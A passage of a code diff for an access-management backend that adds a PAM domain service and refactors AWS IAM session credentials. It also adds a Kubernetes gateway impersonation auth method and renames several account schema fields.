metadata.length > 0) { + metadataRows = await resourceMetadataDAL.insertMany( + metadata.map(({ key, value }) => ({ + key, + value: value ?? "", + pamDomainId: created.id, + orgId: actor.orgId + })), + tx + ); + } + return { domain: created, insertedMetadata: metadataRows }; + }); + + return { + ...(await decryptDomain(newDomain, projectId, kmsService)), + metadata: insertedMetadata?.map(({ id, key, value }) => ({ id, key, value: value ?? "" })) ?? [] + }; + } catch (err) { + if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + throw err; + } + }; + + const updateById = async ( + { domainId, connectionDetails, name, gatewayId, metadata }: TUpdateDomainDTO, + actor: OrgServiceActor + ) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const existingMetadata = await pamDomainDAL.findMetadataByDomainIds([domainId]); + const currentMetadata = existingMetadata[domainId] || []; + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Edit, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: currentMetadata + }) + ); + + if (metadata || name) { + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Edit, + subject(ProjectPermissionSub.PamDomains, { + name: name ?? domain.name, + domainType: domain.domainType, + metadata: metadata ? metadata.map(({ key, value }) => ({ key, value: value ?? "" })) : currentMetadata + }) + ); + } + + const updateDoc: Partial = {}; + const effectiveGatewayId = gatewayId !== undefined ? gatewayId : domain.gatewayId; + + if (gatewayId !== undefined) { + updateDoc.gatewayId = gatewayId; + } + + if (name !== undefined) { + updateDoc.name = name; + } + + if (connectionDetails !== undefined) { + const factory = PAM_DOMAIN_FACTORY_MAP[domain.domainType as PamDomainType]( + domain.domainType as PamDomainType, + connectionDetails, + effectiveGatewayId, + gatewayV2Service, + domain.projectId + ); + const validatedConnectionDetails = await factory.validateConnection(); + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ + connectionDetails: validatedConnectionDetails, + projectId: domain.projectId, + kmsService + }); + updateDoc.encryptedConnectionDetails = encryptedConnectionDetails; + } + + if (Object.keys(updateDoc).length === 0 && metadata === undefined) { + const existingMeta = await pamDomainDAL.findMetadataByDomainIds([domainId]); + return { + ...(await decryptDomain(domain, domain.projectId, kmsService)), + metadata: existingMeta[domainId] || [] + }; + } + + try { + const updatedDomain = await pamDomainDAL.transaction(async (tx) => { + if (metadata) { + await resourceMetadataDAL.delete({ pamDomainId: domainId }, tx); + if (metadata.length > 0) { + await resourceMetadataDAL.insertMany( + metadata.map(({ key, value }) => ({ + key, + value: value ?? "", + pamDomainId: domainId, + orgId: actor.orgId + })), + tx + ); + } + } + if (Object.keys(updateDoc).length > 0) { + return pamDomainDAL.updateById(domainId, updateDoc, tx); + } + return domain; + }); + + const freshMeta = await pamDomainDAL.findMetadataByDomainIds([domainId]); + + return { + ...(await decryptDomain(updatedDomain, domain.projectId, kmsService)), + metadata: freshMeta[domainId] || [] + }; + } catch (err) { + if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + throw err; + } + }; + + const deleteById = async (id: string, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(id); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${id}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([id]); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Delete, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: metadataByDomainId[id] || [] + }) + ); + + try { + const deletedDomain = await pamDomainDAL.deleteById(id); + return await decryptDomain(deletedDomain, domain.projectId, kmsService); + } catch (err) { + if ( + err instanceof DatabaseError && + (err.error as { code: string })?.code === DatabaseErrorCode.ForeignKeyViolation + ) { + throw new BadRequestError({ + message: "Failed to delete domain because it is attached to active PAM accounts or resources" + }); + } + throw err; + } + }; + + const list = async ({ projectId, actor, actorId, actorAuthMethod, actorOrgId, ...params }: TListDomainsDTO) => { + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + actorAuthMethod, + actorOrgId, + projectId, + actionProjectType: ActionProjectType.PAM + }); + + ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.PamDomains); + + const { domains, totalCount } = await pamDomainDAL.findByProjectId({ + projectId, + ...params + }); + + const domainIds = domains.map((d) => d.id); + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds(domainIds); + + return { + domains: await Promise.all( + domains.map(async (d) => ({ + ...(await decryptDomain(d, projectId, kmsService)), + metadata: metadataByDomainId[d.id] || [] + })) + ), + totalCount + }; + }; + + const listRelatedResources = async (domainId: string, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([domainId]); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Read, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: metadataByDomainId[domainId] || [] + }) + ); + + const relatedResources = await pamResourceDAL.find({ domainId }); + + return Promise.all( + relatedResources.map(async (r) => { + const { encryptedConnectionDetails, encryptedRotationAccountCredentials, encryptedResourceMetadata, ...rest } = + r; + const rConnectionDetails = await decryptResourceConnectionDetails({ + encryptedConnectionDetails, + projectId: domain.projectId, + kmsService + }); + const rotationAccountCredentials = encryptedRotationAccountCredentials + ? await decryptAccountCredentials({ + encryptedCredentials: encryptedRotationAccountCredentials, + projectId: domain.projectId, + kmsService + }) + : null; + return { ...rest, connectionDetails: rConnectionDetails, rotationAccountCredentials } as TWindowsResource; + }) + ); + }; + + const listDomainOptions = () => { + return [{ name: "Active Directory" as const, domain: PamDomainType.ActiveDirectory }].sort((a, b) => + a.name.localeCompare(b.name) + ); + }; + + return { + getById, + create, + updateById, + deleteById, + list, + listRelatedResources, + listDomainOptions + }; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-types.ts b/backend/src/ee/services/pam-domain/pam-domain-types.ts new file mode 100644 index 00000000000..827467d9c21 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-types.ts @@ -0,0 +1,89 @@ +import { z } from "zod"; + +import { OrderByDirection, TProjectPermission } from "@app/lib/types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TResourceMetadataDALFactory } from "@app/services/resource-metadata/resource-metadata-dal"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; +import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; +import { TPostRotateContext } from "../pam-resource/pam-resource-types"; +import { TPermissionServiceFactory } from "../permission/permission-service-types"; +import { TActiveDirectoryConnectionDetails } from "./active-directory/active-directory-domain-types"; +import { TPamDomainDALFactory } from "./pam-domain-dal"; +import { PamDomainOrderBy, PamDomainType } from "./pam-domain-enums"; + +export type TPamDomainConnectionDetails = TActiveDirectoryConnectionDetails; + +export type TPamDomain = { + id: string; + projectId: string; + name: string; + domainType: PamDomainType; + gatewayId?: string | null; + discoveryFingerprint?: string | null; + createdAt: Date; + updatedAt: Date; + connectionDetails: TPamDomainConnectionDetails; + metadata?: Array<{ id: string; key: string; value: string }>; +}; + +export type TCreateDomainDTO = { + projectId: string; + name: string; + domainType: PamDomainType; + gatewayId?: string | null; + connectionDetails: TPamDomainConnectionDetails; + metadata?: z.input; +}; + +export type TUpdateDomainDTO = { + domainId: string; + name?: string; + gatewayId?: string | null; + connectionDetails?: TPamDomainConnectionDetails; + metadata?: z.input; +}; + +export type TListDomainsDTO = { + search?: string; + orderBy?: PamDomainOrderBy; + orderDirection?: OrderByDirection; + limit?: number; + offset?: number; + discoveryFingerprint?: string; + filterDomainTypes?: string[]; +} & TProjectPermission; + +export type TDeleteDomainDTO = { + domainId: string; +}; + +export type TPamDomainServiceFactoryDep = { + pamDomainDAL: TPamDomainDALFactory; + pamResourceDAL: Pick; + permissionService: Pick; + kmsService: Pick; + gatewayV2Service: Pick; + resourceMetadataDAL: Pick; +}; + +export type TPamDomainFactory = ( + domainType: PamDomainType, + connectionDetails: T, + gatewayId: string | null | undefined, + gatewayV2Service: Pick, + projectId: string | null | undefined +) => { + validateConnection: () => Promise; + validateAccountCredentials: (credentials: C) => Promise; + rotateAccountCredentials: (rotationAccountCredentials: C, currentCredentials: C) => Promise; + postRotate?: ( + accountId: string, + newCredentials: C, + projectId: string, + ctx: TPostRotateContext, + rotationAccountCredentials: C + ) => Promise; + handleOverwritePreventionForCensoredValues: (updatedAccountCredentials: C, currentCredentials: C) => Promise; +}; diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts deleted file mode 100644 index 5b4ad8a2991..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-fns.ts +++ /dev/null @@ -1,8 +0,0 @@ -import { ActiveDirectoryResourceListItemSchema } from "./active-directory-resource-schemas"; - -export const getActiveDirectoryResourceListItem = () => { - return { - name: ActiveDirectoryResourceListItemSchema.shape.name.value, - resource: ActiveDirectoryResourceListItemSchema.shape.resource.value - }; -}; diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts deleted file mode 100644 index de81a0e798f..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-schemas.ts +++ /dev/null @@ -1,113 +0,0 @@ -import { z } from "zod"; - -import { PamResource } from "../pam-resource-enums"; -import { - BaseCreateGatewayPamResourceSchema, - BaseCreatePamAccountSchema, - BasePamAccountSchema, - BasePamAccountSchemaWithResource, - BasePamResourceSchema, - BaseUpdateGatewayPamResourceSchema, - BaseUpdatePamAccountSchema -} from "../pam-resource-schemas"; -import { ActiveDirectoryAccountType } from "./active-directory-resource-enums"; - -// Resources -const BaseActiveDirectoryResourceSchema = BasePamResourceSchema.extend({ - resourceType: z.literal(PamResource.ActiveDirectory) -}); - -export const ActiveDirectoryResourceListItemSchema = z.object({ - name: z.literal("Active Directory"), - resource: z.literal(PamResource.ActiveDirectory) -}); - -export const ActiveDirectoryResourceConnectionDetailsSchema = z.object({ - domain: z.string().trim().min(1).max(255), - dcAddress: z.string().trim().min(1).max(255), - port: z.coerce.number().int().min(1).max(65535), - useLdaps: z.boolean(), - ldapRejectUnauthorized: z.boolean(), - ldapCaCert: z - .string() - .trim() - .transform((val) => val || undefined) - .optional(), - ldapTlsServerName: z - .string() - .trim() - .transform((val) => val || undefined) - .optional() -}); - -// Credentials (username + password for AD) -export const ActiveDirectoryAccountCredentialsSchema = z.object({ - username: z.string().trim().min(1).max(255), - password: z.string().trim().min(1).max(255) -}); - -// Account metadata -export const ActiveDirectoryAccountMetadataSchema = z.object({ - accountType: z.nativeEnum(ActiveDirectoryAccountType), - adGuid: z.string().optional(), - displayName: z.string().optional(), - userPrincipalName: z.string().optional(), - servicePrincipalName: z.string().array().optional(), - userAccountControl: z.number().optional(), - passwordLastSet: z.string().optional(), - lastLogon: z.string().optional() -}); - -export const ActiveDirectoryResourceSchema = BaseActiveDirectoryResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -export const SanitizedActiveDirectoryResourceSchema = BaseActiveDirectoryResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: z - .object({ - username: z.string() - }) - .nullable() - .optional() -}); - -export const CreateActiveDirectoryResourceSchema = BaseCreateGatewayPamResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema, - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -export const UpdateActiveDirectoryResourceSchema = BaseUpdateGatewayPamResourceSchema.extend({ - connectionDetails: ActiveDirectoryResourceConnectionDetailsSchema.optional(), - rotationAccountCredentials: ActiveDirectoryAccountCredentialsSchema.nullable().optional() -}); - -// Accounts -export const ActiveDirectoryAccountSchema = BasePamAccountSchema.extend({ - credentials: ActiveDirectoryAccountCredentialsSchema, - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -export const CreateActiveDirectoryAccountSchema = BaseCreatePamAccountSchema.extend({ - credentials: ActiveDirectoryAccountCredentialsSchema, - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -export const UpdateActiveDirectoryAccountSchema = BaseUpdatePamAccountSchema.extend({ - credentials: ActiveDirectoryAccountCredentialsSchema.optional(), - internalMetadata: ActiveDirectoryAccountMetadataSchema.optional() -}); - -export const SanitizedActiveDirectoryAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.ActiveDirectory), - credentials: z.object({ - username: z.string() - }), - internalMetadata: ActiveDirectoryAccountMetadataSchema -}); - -// Sessions -export const ActiveDirectorySessionCredentialsSchema = ActiveDirectoryResourceConnectionDetailsSchema.and( - ActiveDirectoryAccountCredentialsSchema -); diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts b/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts deleted file mode 100644 index df6e1033d2a..00000000000 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-types.ts +++ /dev/null @@ -1,18 +0,0 @@ -import { z } from "zod"; - -import { - ActiveDirectoryAccountCredentialsSchema, - ActiveDirectoryAccountMetadataSchema, - ActiveDirectoryAccountSchema, - ActiveDirectoryResourceConnectionDetailsSchema, - ActiveDirectoryResourceSchema -} from "./active-directory-resource-schemas"; - -// Resources -export type TActiveDirectoryResource = z.infer; -export type TActiveDirectoryResourceConnectionDetails = z.infer; - -// Accounts -export type TActiveDirectoryAccount = z.infer; -export type TActiveDirectoryAccountCredentials = z.infer; -export type TActiveDirectoryAccountInternalMetadata = z.infer; diff --git a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts index 97415a0888f..20b7e52fe4c 100644 --- a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts +++ b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-federation.ts @@ -181,10 +181,19 @@ export const validateTargetRoleAssumption = async ({ } }; +export type TAwsIamSessionCredentials = { + accessKeyId: string; + secretAccessKey: string; + sessionToken: string; + expiresAt: Date; +}; + /** - * Assumes the target role and generates a federated console sign-in URL. + * Runs the STS role-chaining sequence and returns the temporary credentials + * that the caller can either consume directly (CLI) or exchange for a + * federated console sign-in URL via {@link exchangeCredentialsForConsoleUrl}. */ -export const generateConsoleFederationUrl = async ({ +export const generateAwsIamSessionCredentials = async ({ connectionDetails, targetRoleArn, roleSessionName, @@ -196,7 +205,7 @@ export const generateConsoleFederationUrl = async ({ roleSessionName: string; projectId: string; sessionDuration: number; -}): Promise<{ consoleUrl: string; expiresAt: Date }> => { +}): Promise => { const pamCredentials = await assumePamRole({ connectionDetails, projectId, @@ -216,15 +225,31 @@ export const generateConsoleFederationUrl = async ({ const { AccessKeyId, SecretAccessKey, SessionToken, Expiration } = targetCredentials!; - // Generate federation URL + if (!AccessKeyId || !SecretAccessKey || !SessionToken) { + throw new InternalServerError({ + message: "AWS STS returned credentials missing required fields" + }); + } + + return { + accessKeyId: AccessKeyId, + secretAccessKey: SecretAccessKey, + sessionToken: SessionToken, + expiresAt: Expiration ?? new Date(Date.now() + sessionDuration * 1000) + }; +}; + +// Exchanges existing STS credentials for a one-shot AWS console sign-in URL +export const exchangeCredentialsForConsoleUrl = async ( + credentials: Pick +): Promise => { const sessionJson = JSON.stringify({ - sessionId: AccessKeyId, - sessionKey: SecretAccessKey, - sessionToken: SessionToken + sessionId: credentials.accessKeyId, + sessionKey: credentials.secretAccessKey, + sessionToken: credentials.sessionToken }); const federationEndpoint = "https://signin.aws.amazon.com/federation"; - const signinTokenUrl = `${federationEndpoint}?Action=getSigninToken&Session=${encodeURIComponent(sessionJson)}`; const tokenResponse = await request.get<{ SigninToken?: string }>(signinTokenUrl); @@ -236,10 +261,5 @@ export const generateConsoleFederationUrl = async ({ } const consoleDestination = `https://console.aws.amazon.com/`; - const consoleUrl = `${federationEndpoint}?Action=login&SigninToken=${encodeURIComponent(tokenResponse.data.SigninToken)}&Destination=${encodeURIComponent(consoleDestination)}`; - - return { - consoleUrl, - expiresAt: Expiration ?? new Date(Date.now() + sessionDuration * 1000) - }; + return `${federationEndpoint}?Action=login&SigninToken=${encodeURIComponent(tokenResponse.data.SigninToken)}&Destination=${encodeURIComponent(consoleDestination)}`; }; diff --git a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts index cc79f17d8c2..8b6f8cfc666 100644 --- a/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/aws-iam/aws-iam-resource-schemas.ts @@ -72,7 +72,7 @@ export const UpdateAwsIamAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedAwsIamAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.AwsIam), + parentType: z.literal(PamResource.AwsIam), credentials: AwsIamAccountCredentialsSchema.pick({ targetRoleArn: true, defaultSessionDuration: true diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts index 21d7da806ce..a846debbe4a 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-enums.ts @@ -1,3 +1,4 @@ export enum KubernetesAuthMethod { - ServiceAccountToken = "service-account-token" + ServiceAccountToken = "service-account-token", + GatewayKubernetesAuth = "gateway-kubernetes-auth" } diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts index d2c50dfc3ae..d58e6e19f08 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-factory.ts @@ -1,8 +1,9 @@ -import axios, { AxiosError } from "axios"; +import { AxiosError } from "axios"; import https from "https"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; -import { GatewayProxyProtocol } from "@app/lib/gateway/types"; +import { GatewayHttpProxyActions, GatewayProxyProtocol } from "@app/lib/gateway/types"; import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; @@ -71,6 +72,38 @@ export const executeWithGateway = async ( ); }; +const validateWithGatewayHttp = async ( + config: { + gatewayId: string; + }, + gatewayV2Service: Pick, + operation: (baseUrl: string) => Promise +): Promise => { + // For gateway-auth validation, the gateway auto-discovers the K8s API from env vars, + // so we use a placeholder host/port. The actual target is resolved by the gateway's + // use-k8s-sa handler via KUBERNETES_SERVICE_HOST env var. + const platformConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: config.gatewayId, + targetHost: "kubernetes.default.svc.cluster.local", + targetPort: 443 + }); + if (!platformConnectionDetails) { + throw new BadRequestError({ message: "Unable to connect to gateway, no platform connection details found" }); + } + return withGatewayV2Proxy( + async (proxyPort) => { + const baseUrl = `http://localhost:${proxyPort}`; + return operation(baseUrl); + }, + { + protocol: GatewayProxyProtocol.Http, + relayHost: platformConnectionDetails.relayHost, + gateway: platformConnectionDetails.gateway, + relay: platformConnectionDetails.relay + } + ); +}; + export const kubernetesResourceFactory: TPamResourceFactory< TKubernetesResourceConnectionDetails, TKubernetesAccountCredentials, @@ -87,7 +120,7 @@ export const kubernetesResourceFactory: TPamResourceFactory< async (baseUrl, httpsAgent) => { // Validate connection by checking API server version try { - await axios.get(`${baseUrl}/version`, { + await request.get(`${baseUrl}/version`, { ...(httpsAgent ? { httpsAgent } : {}), signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), timeout: EXTERNAL_REQUEST_TIMEOUT @@ -127,17 +160,19 @@ export const kubernetesResourceFactory: TPamResourceFactory< if (!gatewayId) { throw new BadRequestError({ message: "Gateway ID is required" }); } - try { - await executeWithGateway( - { connectionDetails, gatewayId, resourceType }, - gatewayV2Service, - async (baseUrl, httpsAgent) => { - const { authMethod } = credentials; - if (authMethod === KubernetesAuthMethod.ServiceAccountToken) { + + const { authMethod } = credentials; + + if (authMethod === KubernetesAuthMethod.ServiceAccountToken) { + try { + await executeWithGateway( + { connectionDetails, gatewayId, resourceType }, + gatewayV2Service, + async (baseUrl, httpsAgent) => { // Validate service account token using SelfSubjectReview API (whoami) // This endpoint doesn't require any special permissions from the service account try { - await axios.post( + await request.post( `${baseUrl}/apis/authentication.k8s.io/v1/selfsubjectreviews`, { apiVersion: "authentication.k8s.io/v1", @@ -169,22 +204,97 @@ export const kubernetesResourceFactory: TPamResourceFactory< } throw error; } - } else { - throw new BadRequestError({ - message: `Unsupported Kubernetes auth method: ${authMethod as string}` - }); } + ); + return credentials; + } catch (error) { + if (error instanceof BadRequestError) { + throw error; } - ); - return credentials; - } catch (error) { - if (error instanceof BadRequestError) { - throw error; + throw new BadRequestError({ + message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` + }); } - throw new BadRequestError({ - message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` - }); } + + if (authMethod === KubernetesAuthMethod.GatewayKubernetesAuth) { + // Validate gateway auth by performing an impersonated SelfSubjectReview through the gateway. + // The gateway's use-k8s-sa handler injects its own pod token and discovers the K8s API. + // We add Impersonate-User header which passes through untouched. + // This validates that the gateway has RBAC permission to impersonate the specified SA. + // NOTE: It does NOT verify the SA exists β€” K8s impersonation is a pure permission check. + // A non-existent SA passes validation here but fails at session time with 403. + try { + await validateWithGatewayHttp({ gatewayId }, gatewayV2Service, async (baseUrl) => { + const impersonateUser = `system:serviceaccount:${credentials.namespace}:${credentials.serviceAccountName}`; + try { + await request.post( + `${baseUrl}/apis/authentication.k8s.io/v1/selfsubjectreviews`, + { + apiVersion: "authentication.k8s.io/v1", + kind: "SelfSubjectReview" + }, + { + headers: { + "Content-Type": "application/json", + "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount, + "Impersonate-User": impersonateUser + }, + signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), + timeout: EXTERNAL_REQUEST_TIMEOUT + } + ); + + logger.info( + `[Kubernetes Resource Factory] Gateway K8s auth validation successful [namespace=${credentials.namespace}] [sa=${credentials.serviceAccountName}]` + ); + } catch (error) { + if (error instanceof AxiosError) { + const errorMessage = + (error.response?.data as { message?: string })?.message || error.response?.statusText || error.message; + + if (errorMessage?.includes("failed to read k8s sa auth token")) { + throw new BadRequestError({ + message: + "Gateway is not running inside a Kubernetes cluster. Gateway auth requires the gateway to be deployed as a pod." + }); + } + if (error.response?.status === 403) { + if (errorMessage?.includes("impersonate")) { + throw new BadRequestError({ + message: `Gateway service account lacks impersonation permissions for service account "${credentials.serviceAccountName}" in namespace "${credentials.namespace}". Ensure the gateway's ClusterRole includes the impersonate verb for this service account.` + }); + } + throw new BadRequestError({ + message: `Unable to impersonate service account "${credentials.serviceAccountName}" in namespace "${credentials.namespace}": ${errorMessage}` + }); + } + if (error.code === "ECONNABORTED" || error.code === "ERR_CANCELED") { + throw new BadRequestError({ + message: "Unable to reach the Kubernetes API server through the gateway." + }); + } + throw new BadRequestError({ + message: `Unable to validate gateway auth credentials: ${errorMessage}` + }); + } + throw error; + } + }); + return credentials; + } catch (error) { + if (error instanceof BadRequestError) { + throw error; + } + throw new BadRequestError({ + message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` + }); + } + } + + throw new BadRequestError({ + message: `Unsupported Kubernetes auth method: ${authMethod as string}` + }); }; const rotateAccountCredentials: TPamResourceFactoryRotateAccountCredentials< @@ -215,6 +325,9 @@ export const kubernetesResourceFactory: TPamResourceFactory< } } + // Gateway auth has no sensitive fields (namespace and serviceAccountName are identifiers, not secrets), + // so no sentinel handling is needed β€” fall through to return as-is. + return updatedAccountCredentials; }; diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts index aa60e91fb45..4e2b8362575 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts @@ -36,8 +36,15 @@ export const KubernetesServiceAccountTokenCredentialsSchema = z.object({ serviceAccountToken: z.string().trim().max(10000) }); +export const KubernetesGatewayAuthCredentialsSchema = z.object({ + authMethod: z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string().trim().min(1).max(63), + serviceAccountName: z.string().trim().min(1).max(253) +}); + export const KubernetesAccountCredentialsSchema = z.discriminatedUnion("authMethod", [ - KubernetesServiceAccountTokenCredentialsSchema + KubernetesServiceAccountTokenCredentialsSchema, + KubernetesGatewayAuthCredentialsSchema ]); export const KubernetesResourceSchema = BaseKubernetesResourceSchema.extend({ @@ -51,6 +58,11 @@ export const SanitizedKubernetesResourceSchema = BaseKubernetesResourceSchema.ex .discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(KubernetesAuthMethod.ServiceAccountToken) + }), + z.object({ + authMethod: z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string(), + serviceAccountName: z.string() }) ]) .nullable() @@ -81,10 +93,15 @@ export const UpdateKubernetesAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedKubernetesAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Kubernetes), + parentType: z.literal(PamResource.Kubernetes), credentials: z.discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(KubernetesAuthMethod.ServiceAccountToken) + }), + z.object({ + authMethod: z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string(), + serviceAccountName: z.string() }) ]) }); diff --git a/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts b/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts index eb2eea7b8da..dc4f3be59ca 100644 --- a/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts @@ -117,7 +117,7 @@ export const UpdateMongoDBAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedMongoDBAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MongoDB), + parentType: z.literal(PamResource.MongoDB), credentials: MongoDBAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts b/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts index d865563b619..b7f15197be0 100644 --- a/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts @@ -64,7 +64,7 @@ export const UpdateMsSQLAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedMsSQLAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MsSQL), + parentType: z.literal(PamResource.MsSQL), credentials: MsSQLAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts b/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts index 61a88246cda..9f6604c2cc5 100644 --- a/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts @@ -67,7 +67,7 @@ export const UpdateMySQLAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedMySQLAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MySQL), + parentType: z.literal(PamResource.MySQL), credentials: MySQLAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/pam-resource-dal.ts b/backend/src/ee/services/pam-resource/pam-resource-dal.ts index 6a35aff50c2..8429700c5be 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-dal.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-dal.ts @@ -135,16 +135,16 @@ export const pamResourceDALFactory = (db: TDbClient) => { return byResourceId; }; - const findByAdServerResourceId = async 